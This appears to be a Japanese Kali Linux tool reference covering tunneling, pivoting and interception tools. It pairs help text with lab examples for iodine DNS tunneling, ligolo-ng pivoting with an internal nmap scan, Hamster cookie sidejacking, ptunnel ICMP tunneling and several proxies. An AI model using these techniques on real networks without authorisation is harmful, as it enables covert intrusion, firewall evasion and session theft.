Usage: iodined [-v] [-h] [-c] [-s] [-f] [-D] [-u user] [-t chrootdir] [-d device] [-m mtu] [-z context] [-l ip address to listen on] [-p port] [-n external ip] [-b dnsport] [-P password] [-F pidfile] tunnel_ip[/netmask] topdomain
-v to print version info and exit
-h to print this help and exit
-c to disable check of client IP/port on each request
-s to skip creating and configuring the tun device, which then has to be created manually
-f to keep running in foreground
-D to increase debug level
(using -DD in UTF-8 terminal: "LC_ALL=C luit iodined -DD ...")
-u name to drop privileges and run as user 'name'
-t dir to chroot to directory dir
-d device to set tunnel device name
-m mtu to set tunnel device mtu
-z context to apply SELinux context after initialization
-l ip address to listen on for incoming dns traffic (default 0.0.0.0)
-p port to listen on for incoming dns traffic (default 53)
-n ip to respond with to NS queries
-b port to forward normal DNS queries to (on localhost)
-P password used for authentication (max 32 chars will be used)
-F pidfile to write pid to a file
-i maximum idle time before shutting down
tunnel_ip is the IP number of the local tunnel interface.
/netmask sets the size of the tunnel network.
topdomain is the FQDN that is delegated to this server.
# クライアント
root@kali:~# iodine -h
Usage: iodine [-v] [-h] [-f] [-r] [-u user] [-t chrootdir] [-d device] [-P password] [-m maxfragsize] [-M maxlen] [-T type] [-O enc] [-L 0|1] [-I sec] [-z context] [-F pidfile] [nameserver] topdomain
Options to try if connection doesn\'t work:
-T force dns type: NULL, PRIVATE, TXT, SRV, MX, CNAME, A (default: autodetect)
-O force downstream encoding for -T other than NULL: Base32, Base64, Base64u,
Base128, or (only for TXT:) Raw (default: autodetect)
-I max interval between requests (default 4 sec) to prevent DNS timeouts
-L 1: use lazy mode for low-latency (default). 0: don\'t (implies -I1)
-m max size of downstream fragments (default: autodetect)
-M max size of upstream hostnames (~100-255, default: 255)
-r to skip raw UDP mode attempt
-P password used for authentication (max 32 chars will be used)
Other options:
-v to print version info and exit
-h to print this help and exit
-f to keep running in foreground
-u name to drop privileges and run as user 'name'
-t dir to chroot to directory dir
-d device to set tunnel device name
-z context, to apply specified SELinux context after initialization
-F pidfile to write pid to a file
nameserver is the IP number/hostname of the relaying nameserver. if absent, /etc/resolv.conf is used
topdomain is the FQDN that is delegated to the tunnel endpoint.
■ 使用例
# サーバーを起動
root@kali_server:~# iodined -f -c -P hello 10.0.0.1 example.com
Opened dns0
Setting IP of dns0 to 10.0.0.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain example.com
# インターフェースにdns0が追加される
root@kali_server:~# iifconfig
dns0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1130
inet 10.0.0.1 netmask 255.255.255.224 destination 10.0.0.1
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 4071 bytes 360888 (352.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4113 bytes 500676 (488.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
[...]
# クライアントを起動
root@kali_client:~# iodine -f -r 192.168.11.4 example.com
Enter password:
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for example.com to 192.168.11.4
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 10.0.0.2
Setting MTU of dns0 to 1130
Server tunnel IP is 10.0.0.1
[...]
Connection setup complete, transmitting data.
# SSHをSOCKSサーバーとして起動
root@kali_client:~# ssh root@10.0.0.1 -N -D 9999
# SOCKSサーバー経由でHTTPリクエストを送信
root@kali_client:~# curl -L -4 http://google.com -x socks5h://127.0.0.1:9999
# 全ての通信が53番ポートで行われている
root@kali_client:~# tcpdump -n -i eth0 port 53 or port 80 or port 22
11:58:51.072332 IP 192.168.11.3.41204 > 192.168.11.4.53: 41211+ [1au] NULL? paaaioyq.example.com. (49)
11:58:51.072642 IP 192.168.11.4.53 > 192.168.11.3.41204: 33484*- 1/0/0 NULL (52)
11:58:54.253739 IP 192.168.11.3.41204 > 192.168.11.4.53: 48938+ [1au] NULL? 0aabv82M-J2hbM->M-nkM-VflM-AM-]lbM-^M-^5M-UM-geUdbM-BM-`dE4M-^M-^iKM-oM-AM-xM-vM-|M-}fM-PM-kiytM-DpDM-Z0cbmoM-UM-b.gM-bM-lM-LrM-eRM-<jaM-MXM-wv6WM-F2kM-rM-@M-ME7M->QM-qTEM-qMM-hM-{OM-uM-wM-MM-MOM-pFM-EM-uBM-iIM-{3M-cM-gM-TY0SPM-}M-U.M-IM-sM-OM-mM-YAMM-bM-rM-WN4M-KzXM-RM-@GM-xM-eM-cM-AM-Ga6M-ubLM-J.example.com. (191)
11:58:54.254460 IP 192.168.11.4.53 > 192.168.11.3.41204: 41211*- 1/0/0 NULL (115)
11:58:54.254672 IP 192.168.11.3.41204 > 192.168.11.4.53: 56665+ [1au] NULL? 0ebbw82M-J2hbM->M-nkM-VglM-IM-]RbM-^M-^5M-]M-f4UdbM-BM-`dE4M-^M-^iKM-oM-AM-{M-wM-uM-|lLM-XaYhmFhM-aqyuW4M-Zq.M-YM-qgGM-IFTM-waGgM-HM-JD9.example.com. (119)
11:58:54.258191 IP 192.168.11.4.53 > 192.168.11.3.41204: 48938*- 1/0/0 NULL (257)
[...]
Ligolo-ng
TUNインターフェースを使用してトンネルを確立します。
■ 使用方法
# サーバー
root@kali:~# ligolo-proxy --help
Usage of ligolo-proxy:
-allow-domains string
autocert authorised domains, if empty, allow all domains, multiple domains should be comma-separated.
-autocert
automatically request letsencrypt certificates, requires port 80 to be accessible
-certfile string
TLS server certificate (default "certs/cert.pem")
-keyfile string
TLS server key (default "certs/key.pem")
-laddr string
listening address (default "0.0.0.0:11601")
-selfcert
dynamically generate self-signed certificates
-selfcert-domain string
The selfcert TLS domain to use (default "ligolo")
-v enable verbose mode
-version
show the current version
# エージェント
root@kali:~# ligolo-agent --help
Usage of ligolo-agent:
-accept-fingerprint string
accept certificates matching the following SHA256 fingerprint (hex format)
-bind string
bind to ip:port
-connect string
connect to proxy (domain:port)
-ignore-cert
ignore TLS certificate validation (dangerous), only for debug purposes
-retry
auto-retry on error
-socks string
socks5 proxy address (ip:port)
-socks-pass string
socks5 password
-socks-user string
socks5 username
-v enable verbose mode
-version
show the current version
■ 使用例
# サーバー起動
root@kali_srv:~# ligolo-proxy -certfile cert.pem -keyfile key.pem
INFO[0000] Listening on 0.0.0.0:11601
ligolo-ng »
# エージェント起動
# フィンガープリントは以下コマンドで取得したものを指定
# openssl x509 -fingerprint -sha256 -noout -in cert.pem | cut -d= -f2 | tr -d ':'
root@kali_ag:~# ligolo-agent -connect 192.168.11.3:11601 -v -accept-fingerprint 90F666CB05E3FCB5FA1013C305460772B69EA2D993C75A439EABDC8E127EB720
INFO[0000]/build/ligolo-ng-YhH1aP/ligolo-ng-0.6.2/cmd/agent/main.go:162 main.connect() Connection established
# サーバー側で新たにインターフェースを作成
ligolo-ng » interface_create --name "evil-ch"
INFO[0109] Creating a new "evil-ch" interface...
INFO[0109] Interface created!
# エージェントとのセッションを開始
ligolo-ng » session
? Specify a session : 1 - #1 - root@kali_ag - [192.168.11.4]:44312
# エージェント側のインターフェース情報を表示
[Agent : root@kali_ag] » ifconfig
[...]
┌───────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬────────────────────────────────┤
│ Name │ eth1 │
│ Hardware MAC │ 02:42:ac:12:00:02 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.65.2/24 │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 2 │
├──────────────┬────────────────────────────────┤
│ Name │ eth0 │
│ Hardware MAC │ 02:42:ac:13:00:03 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.11.4/24 │
└──────────────┴────────────────────────────────┘
# 作成したインターフェースに対してルート(エージェント側の内部ネットワーク)を追加
[Agent : root@kali_ag] » route_add --name evil-ch --route 192.168.65.0/24
INFO[1500] Route created.
# インターフェースを指定してトンネルを開始
[Agent : root@kali_ag] » tunnel_start --tun evil-ch
[Agent : root@kali_ag] » INFO[1714] Starting tunnel to root@kali_ag
# トンネルを開始した状態でサーバーからエージェントの内部ネットワークに対してポートスキャンを実行
root@kali_srv:~# nmap -v -n 192.168.65.0/24 -T4 --unprivileged
Initiating Ping Scan at 06:34
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 06:34, 2.95s elapsed (256 total hosts)
[...]
Initiating Connect Scan at 06:34
Scanning 3 hosts [1000 ports/host]
[...]
Nmap scan report for 192.168.65.1
Host is up (0.016s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
111/tcp open rpcbind
8080/tcp open http-proxy
Nmap scan report for 192.168.65.2
Host is up (0.022s latency).
All 1000 scanned ports on 192.168.65.2 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.65.3
Host is up (0.016s latency).
Not shown: 979 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Hamster
プロキシサーバーとして動作し、セッションクッキーなどを窃取します。
■ 使用例
# プロキシサーバー起動
root@kali:~# hamster-sidejack
--- HAMPSTER 2.0 side-jacking tool ---
beginning thread
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
# Hamsterをプロキシに設定してリクエストを送信
root@kali:~# curl http://192.168.11.4 -x http://127.0.0.1:1234 -b "wordpress_test_cookie=WP%20Cookie%20check; path=/"
root@kali:~# hamster-sidejack
--- HAMPSTER 2.0 side-jacking tool ---
beginning thread
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
# リクエストヘッダー情報が表示される
GET /
GET / HTTP/1.1
Host: 192.168.11.4
User-Agent: curl/8.9.1
Accept: */*
Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/
mitmproxy
SSL/TLSに対応した対話型のインターセプトプロキシです。
■ 使用方法
root@kali:~# mitmproxy --help
usage: mitmproxy [options]
options:
-h, --help show this help message and exit
--version show version number and exit
--options Show all options and their default values
--commands Show all commands and their signatures
--set option[=value] Set an option. When the value is omitted, booleans are set to true, strings and integers are set to None (if
permitted), and sequences are emptied. Boolean values can be true, false or toggle. Sequences are set using multiple
invocations to set for the same option.
-q, --quiet Quiet.
-v, --verbose Increase log verbosity.
--mode MODE, -m MODE The proxy server type(s) to spawn. Can be passed multiple times. Mitmproxy supports "regular" (HTTP), "transparent",
"socks5", "reverse:SPEC", "upstream:SPEC", and "wireguard[:PATH]" proxy servers. For reverse and upstream proxy modes,
SPEC is host specification in the form of "http[s]://host[:port]". For WireGuard mode, PATH may point to a file
containing key material. If no such file exists, it will be created on startup. You may append `@listen_port` or
`@listen_host:listen_port` to override `listen_host` or `listen_port` for a specific proxy mode. Features such as
client playback will use the first mode to determine which upstream server to use. May be passed multiple times.
--no-anticache
--anticache Strip out request headers that might cause the server to return 304-not-modified.
--no-showhost
--showhost Use the Host header to construct URLs for display.
--no-show-ignored-hosts
--show-ignored-hosts Record ignored flows in the UI even if we do not perform TLS interception. This option will keep ignored flows\'
contents in memory, which can greatly increase memory usage. A future release will fix this issue, record ignored
flows by default, and remove this option.
--rfile PATH, -r PATH
Read flows from file.
--scripts SCRIPT, -s SCRIPT
Execute a script. May be passed multiple times.
--stickycookie FILTER
Set sticky cookie filter. Matched against requests.
--stickyauth FILTER Set sticky auth filter. Matched against requests.
--save-stream-file PATH, -w PATH
Stream flows to file as they arrive. Prefix path with + to append. The full path can use python strftime() formating,
missing directories are created as needed. A new file is opened every time the formatted string changes.
--no-anticomp
--anticomp Try to convince servers to send us un-compressed data.
--console-layout {horizontal,single,vertical}
Console layout.
--no-console-layout-headers
--console-layout-headers
Show layout component headers
Proxy Options:
--listen-host HOST Address to bind proxy server(s) to (may be overridden for individual modes, see `mode`).
--listen-port PORT, -p PORT
Port to bind proxy server(s) to (may be overridden for individual modes, see `mode`). By default, the port is mode-
specific. The default regular HTTP proxy spawns on port 8080.
--no-server, -n
--server Start a proxy server. Enabled by default.
--ignore-hosts HOST Ignore host and forward all traffic without processing it. In transparent mode, it is recommended to use an IP address
(range), not the hostname. In regular mode, only SSL traffic is ignored and the hostname should be used. The supplied
value is interpreted as a regular expression and matched on the ip or the hostname. May be passed multiple times.
--allow-hosts HOST Opposite of --ignore-hosts. May be passed multiple times.
--tcp-hosts HOST Generic TCP SSL proxy mode for all hosts that match the pattern. Similar to --ignore-hosts, but SSL connections are
intercepted. The communication contents are printed to the log in verbose mode. May be passed multiple times.
--upstream-auth USER:PASS
Add HTTP Basic authentication to upstream proxy and reverse proxy requests. Format: username:password.
--proxyauth SPEC Require proxy authentication. Format: "username:pass", "any" to accept any user/pass combination, "@path" to use an
Apache htpasswd file, or "ldap[s]:url_server_ldap[:port]:dn_auth:password:dn_subtree[?search_filter_key=...]" for LDAP
authentication.
--no-rawtcp
--rawtcp Enable/disable raw TCP connections. TCP connections are enabled by default.
--no-http2
--http2 Enable/disable HTTP/2 support. HTTP/2 support is enabled by default.
SSL:
--certs SPEC SSL certificates of the form "[domain=]path". The domain may include a wildcard, and is equal to "*" if not specified.
The file at path is a certificate in PEM format. If a private key is included in the PEM, it is used, else the default
key in the conf dir is used. The PEM file should contain the full certificate chain, with the leaf certificate as the
first entry. May be passed multiple times.
--cert-passphrase PASS
Passphrase for decrypting the private key provided in the --cert option. Note that passing cert_passphrase on the
command line makes your passphrase visible in your system\'s process list. Specify it in config.yaml to avoid this.
--no-ssl-insecure
--ssl-insecure, -k Do not verify upstream server SSL/TLS certificates.
Client Replay:
--client-replay PATH, -C PATH
Replay client requests from a saved file. May be passed multiple times.
Server Replay:
--server-replay PATH, -S PATH
Replay server responses from a saved file. May be passed multiple times.
--no-server-replay-kill-extra
--server-replay-kill-extra
Kill extra requests during replay (for which no replayable response was found).[Deprecated, prefer to use
server_replay_extra='kill']
--server-replay-extra {forward,kill,204,400,404,500}
Behaviour for extra requests during replay for which no replayable response was found. Setting a numeric string value
will return an empty HTTP response with the respective status code.
--no-server-replay-reuse
--server-replay-reuse
Don\'t remove flows from server replay state after use. This makes it possible to replay same response multiple times.
--no-server-replay-refresh
--server-replay-refresh
Refresh server replay responses by adjusting date, expires and last-modified headers, as well as adjusting cookie
expiration.
Map Remote:
--map-remote PATTERN, -M PATTERN
Map remote resources to another remote URL using a pattern of the form "[/flow-filter]/url-regex/replacement", where
the separator can be any character. May be passed multiple times.
Map Local:
--map-local PATTERN Map remote resources to a local file using a pattern of the form "[/flow-filter]/url-regex/file-or-directory-path",
where the separator can be any character. May be passed multiple times.
Modify Body:
--modify-body PATTERN, -B PATTERN
Replacement pattern of the form "[/flow-filter]/regex/[@]replacement", where the separator can be any character. The @
allows to provide a file path that is used to read the replacement string. May be passed multiple times.
Modify Headers:
--modify-headers PATTERN, -H PATTERN
Header modify pattern of the form "[/flow-filter]/header-name/[@]header-value", where the separator can be any
character. The @ allows to provide a file path that is used to read the header value string. An empty header-value
removes existing header-name headers. May be passed multiple times.
Filters:
See help in mitmproxy for filter expression syntax.
--intercept FILTER Intercept filter expression.
--view-filter FILTER Limit the view to matching flows.
■ 使用例
# プロキシサーバーを起動
root@kali:~# mitmproxy
# CA証明書をダウンロード
root@kali:~# curl --proxy 127.0.0.1:8080 -o mitmproxy-ca-cert.pem http://mitm.it/cert/pem
# プロキシ経由で外部APIを実行
root@kali:~# curl --proxy 127.0.0.1:8080 --cacert mitmproxy-ca-cert.pem https://fakerapi.it/api/v2/addresses
コンソールにHTTPS通信の内容がリアルタイムに表示される
proxify
トラフックのフィルタや置換、組み込みDNSサーバーの機能を持ったプロキシです。
■ 使用方法
root@kali:~# proxify --help
Usage:
./proxify [flags]
Flags:
OUTPUT:
-sr, -store-response store raw http request / response to output directory (default proxify_logs)
-o, -output output file to store proxify logs (default proxify_logs.jsonl)
-of, -output-format string output format (jsonl/yaml) (default "jsonl")
-dump-req Dump only HTTP requests to output file
-dump-resp Dump only HTTP responses to output file
-oca, -out-ca string Generate and Save CA File to filename
UPDATE:
-up, -update update proxify to latest version
-duc, -disable-update-check disable automatic proxify update check
FILTER:
-req-fd, -request-dsl string[] Request Filter DSL
-resp-fd, -response-dsl string[] Response Filter DSL
-req-mrd, -request-match-replace-dsl string[] Request Match-Replace DSL
-resp-mrd, -response-match-replace-dsl string[] Response Match-Replace DSL
NETWORK:
-ha, -http-addr string Listening HTTP IP and Port address (ip:port) (default "127.0.0.1:8888")
-sa, -socks-addr Listening SOCKS IP and Port address (ip:port) (default 127.0.0.1:10080)
-da, -dns-addr string Listening DNS IP and Port address (ip:port)
-dm, -dns-mapping string Domain to IP DNS mapping (eg domain:ip,domain:ip,..)
-r, -resolver string Custom DNS resolvers to use (ip:port)
PROXY:
-hp, -http-proxy string[] Upstream HTTP Proxies (eg http://proxy-ip:proxy-port)
-sp, -socks5-proxy string[] Upstream SOCKS5 Proxies (eg socks5://proxy-ip:proxy-port)
-c int Number of requests before switching to the next upstream proxy (default 1)
EXPORT:
-max-size int Max export data size (request/responses will be truncated) (default 9223372036854775807)
CONFIGURATION:
-config string path to the proxify configuration file
-ec, -export-config string proxify export module configuration file (default "/root/.config/proxify/export-config.yaml")
-config-directory string override the default config path ($home/.config/proxify) (default "/root/.config/proxify")
-cert-cache-size int Number of certificates to cache (default 256)
-a, -allow string[] Allowed list of IP/CIDR\'s to be proxied
-d, -deny string[] Denied list of IP/CIDR\'s to be proxied
-pt, -passthrough string[] List of passthrough domains
DEBUG:
-nc, -no-color No Color
-version Version
-silent Silent
-v, -verbose Verbose
-vv, -very-verbose Very Verbose
■ 使用例
# example.comのIPアドレスを別のIPアドレスにマッピング
root@kali:~# proxify -dns-addr ":53" -dns-mapping "example.com:192.168.11.4" -resolver "8.8.8.8:53"
[INF] Current proxify version v0.0.15 (latest)
[INF] HTTP Proxy Listening on 127.0.0.1:8888
[INF] Saving proxify logs to proxify_logs.jsonl
[INF] Domain => IP: example.com:192.168.11.4
[INF] Fallback Resolver: 8.8.8.8:53
# プロキシ未設定
root@kali:~# curl http://example.com
<!doctype html>
<html>
<head>
<title>Example Domain</title>
[...]
# proxifyをプロキシに設定
root@kali:~# curl -x http://127.0.0.1:8888 http://example.com
hello
# リクエストの内容を書き換え
root@kali:~# proxify -request-match-replace-dsl "replace(request,'posts/1','posts/2')"
# プロキシ未設定
root@kali:~# curl http://jsonplaceholder.typicode.com/posts/1
{
"userId": 1,
"id": 1,
"title": "sunt aut facere repellat provident occaecati excepturi optio reprehenderit",
"body": "quia et suscipit\nsuscipit recusandae consequuntur expedita et cum\nreprehenderit molestiae ut ut quas totam\nnostrum rerum est autem sunt rem eveniet architecto"
}
# proxifyをプロキシに設定
root@kali:~# curl --proxy http://127.0.0.1:8888 http://jsonplaceholder.typicode.com/posts/1
{
"userId": 1,
"id": 2,
"title": "qui est esse",
"body": "est rerum tempore vitae\nsequi sint nihil reprehenderit dolor beatae ea dolores neque\nfugiat blanditiis voluptate porro vel nihil molestiae ut reiciendis\nqui aperiam non debitis possimus qui neque nisi nulla"
}
ProxyChains-NG
プログラムのネットワーク関連libc関数をフックしてSOCKS4a/5またはHTTPプロキシ経由で接続をリダイレクトします。
■ 使用方法
root@kali:~# proxychains4 --help
Usage: proxychains4 -q -f config_file program_name [arguments]
-q makes proxychains quiet - this overrides the config setting
-f allows one to manually specify a configfile to use
for example : proxychains telnet somehost.com
■ 使用例
# ホスト2からホスト3へ接続を転送
root@kali_2:~# ncat -l 8081 --sh-exec "ncat 192.168.56.3"
# ホスト3で待機
root@kali_3:~# ncat -l
# ホスト1でtelnet接続を実行(/etc/proxychains4.confでプロキシに設定したホスト2に転送される)
root@kali_1:~# proxychains4 telnet localhost 23
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Trying 127.0.0.1...
[proxychains] Strict chain ... 192.168.11.4:8081 ... 127.0.0.1:23 ... OK
Connected to localhost.
Escape character is '^]'.
hello
# ホスト1でhelloと入力するとホスト2を経由してホスト3に転送されhelloが表示される(ホスト1とホスト3は別ネットワークのため直接の通信は不可)
root@kali_3:~# ncat -l
hello
Proxytunnel
HTTP(S)プロキシを通して、TCPベースのプロトコルのトンネルを作成します。
■ 使用方法
root@kali:~# proxytunnel --help
Usage: proxytunnel [OPTIONS]...
Standard options:
-i, --inetd Run from inetd (default: off)
-a, --standalone=STRING Run as standalone daemon on specified port or
address:port combination
-p, --proxy=STRING Local proxy host:port combination
-r, --remproxy=STRING Remote proxy host:port combination (using 2 proxies)
-d, --dest=STRING Destination host:port combination
-e, --encrypt SSL encrypt data between local proxy and destination
-E, --encrypt-proxy SSL encrypt data between client and local proxy
-X, --encrypt-remproxy SSL encrypt data between local and remote proxy
Additional options for specific features:
-W, --wa-bug-29744 Workaround ASF Bugzilla 29744: if SSL is active
stop using it after CONNECT (might not work on all
setups)
-B, --buggy-encrypt-proxy Equivalent to -E -W, provided for backwards
compatibility
-z, --no-check-certificate Don\'t verify server SSL certificate
-C, --cacert=STRING Path to trusted CA certificate or directory
-4, --ipv4 Enforce IPv4 connection to local proxy
-6, --ipv6 Enforce IPv6 connection to local proxy
-F, --passfile=STRING File with credentials for proxy authentication
-P, --proxyauth=STRING Proxy auth credentials user:pass combination
-R, --remproxyauth=STRING Remote proxy auth credentials user:pass combination
-c, --cert=FILENAME client SSL certificate (chain)
-k, --key=FILENAME client SSL key
-N, --ntlm Use NTLM based authentication
-t, --domain=STRING NTLM domain (default: autodetect)
-H, --header=STRING Add additional HTTP headers to send to proxy
-o, --host=STRING Send custom Host Header/SNI
-x, --proctitle=STRING Use a different process title
Miscellaneous options:
-v, --verbose Turn on verbosity
-q, --quiet Suppress messages
-h, --help Print help and exit
-V, --version Print version and exit
■ 使用例
# 8080番ポートで接続を待ち受けし、プロキシ経由(192.168.56.2:8888)で目的のホスト(192.168.56.3:22)に接続する
root@kali_2:~# proxytunnel -p 192.168.56.2:8888 -d 192.168.56.3:22 -a 8080
# proxytunnelを起動したホストにSSH接続
root@kali_1:~# ssh hello@192.168.11.4 -p 8080
Last login: Wed Nov 6 07:08:47 2024 from 192.168.56.2
$ hostname
kali_3
ptunnel
ICMPエコー要求および応答パケットを使用してリモートホストへのTCP接続をトンネリングします。
■ 使用方法
root@kali:~# ptunnel --help
Usage: ptunnel -p <addr> -lp <port> -da <dest_addr> -dp <dest_port> [-m max_tunnels] [-v verbosity] [-f logfile]
ptunnel [-m max_threads] [-v verbosity] [-c <device>]
-p: Set address of peer running packet forwarder. This causes
ptunnel to operate in forwarding mode - the absence of this
option causes ptunnel to operate in proxy mode.
-lp: Set TCP listening port (only used when operating in forward mode)
-da: Set remote proxy destination address if client
Restrict to only this destination address if server
-dp: Set remote proxy destionation port if client
Restrict to only this destination port if server
-m: Set maximum number of concurrent tunnels
-v: Verbosity level (-1 to 4, where -1 is no output, and 4 is all output)
-c: Enable libpcap on the given device.
-f: Specify a file to log to, rather than printing to standard out.
-s: Client only. Enables continuous output of statistics (packet loss, etc.)
-daemon: Run in background, the PID will be written in the file supplied as argument
-syslog: Output debug to syslog instead of standard out.
-udp: Toggle use of UDP instead of ICMP. Proxy will listen on port 53 (must be root).
Security features: [-x password] [-u] [-setuid user] [-setgid group] [-chroot dir]
-x: Set password (must be same on client and proxy)
-u: Run proxy in unprivileged mode. This causes the proxy to forward
packets using standard echo requests, instead of crafting custom echo replies.
Unprivileged mode will only work on some systems, and is in general less reliable
than running in privileged mode.
Please consider combining the following three options instead:
-setuid: When started in privileged mode, drop down to user\'s rights as soon as possible
-setgid: When started in privileged mode, drop down to group\'s rights as soon as possible
-chroot: When started in privileged mode, restrict file access to the specified directory
-setcon: Set SELinux context when all there is left to do are network I/O operations
To combine with -chroot you will have to `mount --bind /proc /chrootdir/proc`
■ 使用例
# プロキシホストでptunnelプロキシを起動
root@kali_2:~# ptunnel
[inf]: Starting ptunnel v 0.72.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
# クライアントホストでptunnelクライアントを8000番ポートで起動(プロキシホスト経由で別ネットワークのリモートホストに接続)
root@kali_1:~# ptunnel -p 192.168.11.4 -lp 8000 -da 192.168.56.3 -dp 22 -c eth0
# クライアントホストでptunnelクライアントに対してSSH接続を開始(リモートホストに接続される)
root@kali_1:~# ssh hello@localhost -p 8000
Last login: Wed Nov 6 07:34:54 2024 from 192.168.56.2
$ hostname
kali_3
# プロキシホストでパケットをキャプチャ(クライアントホストとプロキシホスト間でICMP通信が行われている)
root@kali_2:~# tcpdump -n icmp -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:18:45.388405 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 831, length 36
09:18:46.396275 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 832, length 36
09:18:46.409836 IP 192.168.11.3 > 192.168.11.4: ICMP echo request, id 53644, seq 604, length 36
09:18:46.409952 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 604, length 36
[...]
# プロキシホストでパケットをキャプチャ(プロキシホストとリモートホスト間でSSH通信が行われている)
root@kali_2:~# tcpdump -n tcp -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:21:23.271827 IP 192.168.56.2.45094 > 192.168.56.3.22: Flags [P.], seq 1487091414:1487092350, ack 2746030853, win 501, options [nop,nop,TS val 849236767 ecr 1033646964], length 936
09:21:23.272263 IP 192.168.56.3.22 > 192.168.56.2.45094: Flags [P.], seq 1:793, ack 936, win 501, options [nop,nop,TS val 1033744284 ecr 849236767], length 792
09:21:23.272313 IP 192.168.56.2.45094 > 192.168.56.3.22: Flags [.], ack 793, win 501, options [nop,nop,TS val 849236767 ecr 1033744284], length 0
09:21:23.272391 IP 192.168.56.3.22 > 192.168.56.2.45094: Flags [P.], seq 793:837, ack 936, win 501, options [nop,nop,TS val 1033744285 ecr 849236767], length 44
[...]
redsocks
TCP接続をSOCKSプロキシもしくはHTTPSプロキシにリダイレクトします。
■ 使用方法
root@kali:~# redsocks -h
Usage: redsocks [-?hvt] [-c config] [-p pidfile]
-h, -? this message
-v print version
-t test config syntax
-p write pid to pidfile
■ 使用例
# サーバーを起動(デフォルトポート:12345)
root@kali_1:~# redsocks -c /etc/redsocks.conf
# SSHをSOCKSサーバーとして起動
root@kali_1:~# ssh hello@192.168.11.4 -N -D 1080
# ユーザーhelloの外部へのTCP接続の場合のみ12345ポート(redsocks)にリダイレクトする
root@kali_1:~# iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner hello -j REDIRECT --to-ports 12345
# rootユーザーで外部ホストに接続
root@kali_1:~# ncat 192.168.11.4
hello
# rootユーザー時のキャプチャ
root@kali_1:~# tcpdump -n -i eth0 tcp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:57:37.801396 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [S], seq 549533602, win 64240, options [mss 1460,sackOK,TS val 1103279732 ecr 0,nop,wscale 7], length 0
11:57:37.801448 IP 192.168.11.4.31337 > 192.168.11.3.49570: Flags [S.], seq 2320360108, ack 549533603, win 65160, options [mss 1460,sackOK,TS val 800949031 ecr 1103279732,nop,wscale 7], length 0
11:57:37.801455 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [.], ack 1, win 502, options [nop,nop,TS val 1103279732 ecr 800949031], length 0
11:57:39.662757 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [P.], seq 1:7, ack 1, win 502, options [nop,nop,TS val 1103281594 ecr 800949031], length 6
11:57:39.662816 IP 192.168.11.4.31337 > 192.168.11.3.49570: Flags [.], ack 7, win 510, options [nop,nop,TS val 800950893 ecr 1103281594], length 0
# helloユーザーで外部ホストに接続
root@kali_1:~# su hello
$ ncat 192.168.11.4
hello
# helloユーザー時のキャプチャ(SSHが使用されている)
root@kali_1:~# tcpdump -n -i eth0 tcp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:58:25.571393 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [P.], seq 957774049:957774141, ack 2882488548, win 501, options [nop,nop,TS val 1103327505 ecr 800866732], length 92
11:58:25.571432 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [.], ack 92, win 501, options [nop,nop,TS val 800996804 ecr 1103327505], length 0
11:58:25.571682 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [P.], seq 1:45, ack 92, win 501, options [nop,nop,TS val 800996805 ecr 1103327505], length 44
